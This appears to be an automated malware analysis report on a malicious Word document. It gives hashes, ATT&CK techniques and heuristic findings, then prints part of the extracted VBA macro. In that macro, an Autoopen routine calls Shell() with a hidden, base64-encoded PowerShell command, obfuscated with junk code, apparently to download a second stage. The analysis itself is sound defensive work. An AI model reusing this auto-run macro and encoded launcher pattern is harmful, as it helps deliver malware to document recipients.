Office (OLE) malware analysis — malicious · e1fe14151f910231

MALICIOUS

Office (OLE)

98.0 KB Created: 2018-05-31 07:19:00 Authoring application: Microsoft Office Word First seen: 2018-06-21

MD5: 473822f16497e74ae404847bb5429f2e SHA-1: 7ba537ce98c98ad8f47fadbeabd0a088016053c8 SHA-256: e1fe14151f910231362c3c486117f72e7fdd5022b27edbd2dacc761d8239300a

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The Autoopen macro triggers the NvKmETl function, which uses the Shell() function to execute a command. The script attempts to construct a PowerShell command, indicated by the string concatenation 'powershell -WinDowsTyle hidden -e IAAmACgAIAAoAFsAcwBUAHIASQASQBOAG', suggesting it's designed to download and execute a second-stage payload. The presence of Autoopen and Shell() calls strongly indicates a downloader or droppper functionality.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17729 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	17729 bytes
SHA-256: `944ba33d584d5681aff14fb9c77a4e7ba31846d97b95335348dadb884ce4f7e9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ZTsvwzjim" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function NvKmETl() On Error Resume Next Select Case KAlvMmdlX Case 60808 bwbWF = 73907 lCIwAF = CDbl(23683) Case 94154 DujPpv = GkXmq OidkNf = 98117 End Select Select Case KAlZwNaKW Case 93178 lniPEa = 83340 QRfoUl = CDbl(65563) Case 444 KndUQr = zwdwTp ZLiwjD = 52173 End Select NvKmETl = tKazInTdh + Shell(djmBM + Chr(vbKeyP) + CcNwtpYQY + IYEncm + FOvKdSKHji + BzBzhLLXOU + RZhEkd + WZKGFVvu + OZakWpZuiz + qzBjFCNI + cnjbtaJ, WpSbXuQ + vbHide + GUBTtdSlM) Select Case KAlnnnUw Case 99893 RnPNc = 65 SIVwCR = CDbl(16551) Case 94938 XamGcq = wwWoAq wujnip = 62616 End Select End Function Sub Autoopen() On Error Resume Next Select Case KAlMiqtW Case 55140 AJNpsQ = 87111 tibAR = CDbl(31507) Case 10634 hcbZB = idHOR HPjTK = 22249 End Select NvKmETl Select Case KAlNaKzQC Case 69162 EDpPpH = 36442 QvDlf = CDbl(58767) Case 69679 iwfCdz = pFUsl iKWRi = 50422 End Select End Sub Attribute VB_Name = "SzbGoGSYHa" Function CcNwtpYQY() On Error Resume Next Select Case KAlOaJcR Case 7422 clKSob = 20168 rzQms = CDbl(51600) Case 71453 HEuRn = CKtfs VTTRl = 19872 End Select ziJEzOW = "owersHeLL -WinD" + "owsTyle hidden" + " -e IAAm" + "ACgAIAAoAFsAcw" + "BUAHI" + "ASQBOAGc" + "AXQAkAFYARQB" Select Case KAluCdna Case 64320 TvWJzw = 56921 CXXmq = CDbl(18095) Case 67277 ZIiDzX = wBiCqH QTkLzG = 77658 End Select VRRHQOuQDw = "SAEIATwBzAG" + "UAUAByAEU" + "ARgBlA" + "FIAZQBOAEMAR" Select Case KAlivcGQv Case 89952 TOLDEf = 85181 bvRXIP = CDbl(88389) Case 74656 ZHDCf = bKpam tGiDCP = 77554 End Select ClYnAifc = "QApAFsAMQ" + "AsADM" + "AXQArACcAWAAnAC" + "0AagBPAEkAbgA" + "nACcAKQAgAC" + "gAKAAoACcANg" + "BmAFcAbgBzAGEA" Select Case KAlEYlbGk Case 7814 QbTBqw = 83375 qwoEjs = CDbl(28177) Case 8806 ChojT = zFHDA cvuFm = 88924 End Select Tocvab = "ZABhACcAKw" + "AnAHMAZAAgAD0" + "AIAAmACcAKw" + "AnACgAJwArACcA" + "TgAnA" Select Case KAlHlkuP Case 88285 FajvL = 19880 VEDPGw = CDbl(42862) Case 36966 iuqTOA = wwwBzU mYpGz = 48533 End Select qrjciHCdDT = "CsAJwBw" + "AG0AbgBOACcA" + "KwAnA" + "HAAJwArA" Select Case KAlLsqoH Case 83612 qjzrop = 4485 YawFj = CDbl(71330) Case 98615 JjBmQ = QqWtaX AfGJC = 16120 End Select HHSYbVYl = "CcAbQAnACs" + "AJwArAE4AJwArA" + "CcAcABtAGUATgBw" + "AG0AKwBOAH" + "AAJwA" CcNwtpYQY = ziJEzOW + VRRHQOuQDw + ClYnAifc + Tocvab + qrjciHCdDT + HHSYbVYl End Function Function IYEncm() On Error Resume Next Select Case KAlBJJfP Case 74703 OHuskM = 60513 EFEbzP = CDbl(13518) Case 40098 OfzYvs = dcjLza XdqCi = 53490 End Select wkkKFwEtjBY = "rACcAb" + "QB3AC0AbwB" + "iAGoAJw" + "ArACcAZQBjA" + "CcAKwAnAE" + "4AcABtACsATgBwA" + "G0AdAAnACsAJ" + "wBOACcAKwAnAHA" + "AJwArACcAbQ" Select Case KAlpLWTa Case 2078 bIAuo = 29060 jpbTP = CDbl(97929) Case 28276 dThdj = zINYts UaEUq = 82974 End Select tjVdCAj = "AnACs" + "AJwApAC" + "cAKwA" + "nACAA" + "cgBhAG4AZAAnA" + "CsAJwBvAG0AOwA" + "2AGYAVwB" + "ZACcAKwAnA" + "FkAVQAg" + "AD0AIAAuACgAT" Select Case KAlTiRKL Case 11201 oPjScm = 64182 DmwRXi = CDbl(414) Case 75390 vWrPO = wYHMo BWSdtJ = 87298 End Select iHYuiPiNs = "gBw ... (truncated)

SHA-256: 944ba33d584d5681aff14fb9c77a4e7ba31846d97b95335348dadb884ce4f7e9

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ZTsvwzjim"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function NvKmETl()
On Error Resume Next
Select Case KAlvMmdlX
      Case 60808
         bwbWF = 73907
         lCIwAF = CDbl(23683)
      Case 94154
         DujPpv = GkXmq
         OidkNf = 98117
End Select
Select Case KAlZwNaKW
      Case 93178
         lniPEa = 83340
         QRfoUl = CDbl(65563)
      Case 444
         KndUQr = zwdwTp
         ZLiwjD = 52173
End Select
NvKmETl = tKazInTdh + Shell(djmBM + Chr(vbKeyP) + CcNwtpYQY + IYEncm + FOvKdSKHji + BzBzhLLXOU + RZhEkd + WZKGFVvu + OZakWpZuiz + qzBjFCNI + cnjbtaJ, WpSbXuQ + vbHide + GUBTtdSlM)
Select Case KAlnnnUw
      Case 99893
         RnPNc = 65
         SIVwCR = CDbl(16551)
      Case 94938
         XamGcq = wwWoAq
         wujnip = 62616
End Select
End Function
Sub Autoopen()
On Error Resume Next
Select Case KAlMiqtW
      Case 55140
         AJNpsQ = 87111
         tibAR = CDbl(31507)
      Case 10634
         hcbZB = idHOR
         HPjTK = 22249
End Select
NvKmETl
Select Case KAlNaKzQC
      Case 69162
         EDpPpH = 36442
         QvDlf = CDbl(58767)
      Case 69679
         iwfCdz = pFUsl
         iKWRi = 50422
End Select
End Sub


Attribute VB_Name = "SzbGoGSYHa"
Function CcNwtpYQY()
On Error Resume Next
Select Case KAlOaJcR
      Case 7422
         clKSob = 20168
         rzQms = CDbl(51600)
      Case 71453
         HEuRn = CKtfs
         VTTRl = 19872
End Select
ziJEzOW = "owersHeLL -WinD" + "owsTyle hidden" + " -e IAAm" + "ACgAIAAoAFsAcw" + "BUAHI" + "ASQBOAGc" + "AXQAkAFYARQB"
Select Case KAluCdna
      Case 64320
         TvWJzw = 56921
         CXXmq = CDbl(18095)
      Case 67277
         ZIiDzX = wBiCqH
         QTkLzG = 77658
End Select
VRRHQOuQDw = "SAEIATwBzAG" + "UAUAByAEU" + "ARgBlA" + "FIAZQBOAEMAR"
Select Case KAlivcGQv
      Case 89952
         TOLDEf = 85181
         bvRXIP = CDbl(88389)
      Case 74656
         ZHDCf = bKpam
         tGiDCP = 77554
End Select
ClYnAifc = "QApAFsAMQ" + "AsADM" + "AXQArACcAWAAnAC" + "0AagBPAEkAbgA" + "nACcAKQAgAC" + "gAKAAoACcANg" + "BmAFcAbgBzAGEA"
Select Case KAlEYlbGk
      Case 7814
         QbTBqw = 83375
         qwoEjs = CDbl(28177)
      Case 8806
         ChojT = zFHDA
         cvuFm = 88924
End Select
Tocvab = "ZABhACcAKw" + "AnAHMAZAAgAD0" + "AIAAmACcAKw" + "AnACgAJwArACcA" + "TgAnA"
Select Case KAlHlkuP
      Case 88285
         FajvL = 19880
         VEDPGw = CDbl(42862)
      Case 36966
         iuqTOA = wwwBzU
         mYpGz = 48533
End Select
qrjciHCdDT = "CsAJwBw" + "AG0AbgBOACcA" + "KwAnA" + "HAAJwArA"
Select Case KAlLsqoH
      Case 83612
         qjzrop = 4485
         YawFj = CDbl(71330)
      Case 98615
         JjBmQ = QqWtaX
         AfGJC = 16120
End Select
HHSYbVYl = "CcAbQAnACs" + "AJwArAE4AJwArA" + "CcAcABtAGUATgBw" + "AG0AKwBOAH" + "AAJwA"
CcNwtpYQY = ziJEzOW + VRRHQOuQDw + ClYnAifc + Tocvab + qrjciHCdDT + HHSYbVYl
End Function
Function IYEncm()
On Error Resume Next
Select Case KAlBJJfP
      Case 74703
         OHuskM = 60513
         EFEbzP = CDbl(13518)
      Case 40098
         OfzYvs = dcjLza
         XdqCi = 53490
End Select
wkkKFwEtjBY = "rACcAb" + "QB3AC0AbwB" + "iAGoAJw" + "ArACcAZQBjA" + "CcAKwAnAE" + "4AcABtACsATgBwA" + "G0AdAAnACsAJ" + "wBOACcAKwAnAHA" + "AJwArACcAbQ"
Select Case KAlpLWTa
      Case 2078
         bIAuo = 29060
         jpbTP = CDbl(97929)
      Case 28276
         dThdj = zINYts
         UaEUq = 82974
End Select
tjVdCAj = "AnACs" + "AJwApAC" + "cAKwA" + "nACAA" + "cgBhAG4AZAAnA" + "CsAJwBvAG0AOwA" + "2AGYAVwB" + "ZACcAKwAnA" + "FkAVQAg" + "AD0AIAAuACgAT"
Select Case KAlTiRKL
      Case 11201
         oPjScm = 64182
         DmwRXi = CDbl(414)
      Case 75390
         vWrPO = wYHMo
         BWSdtJ = 87298
End Select
iHYuiPiNs = "gBw
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.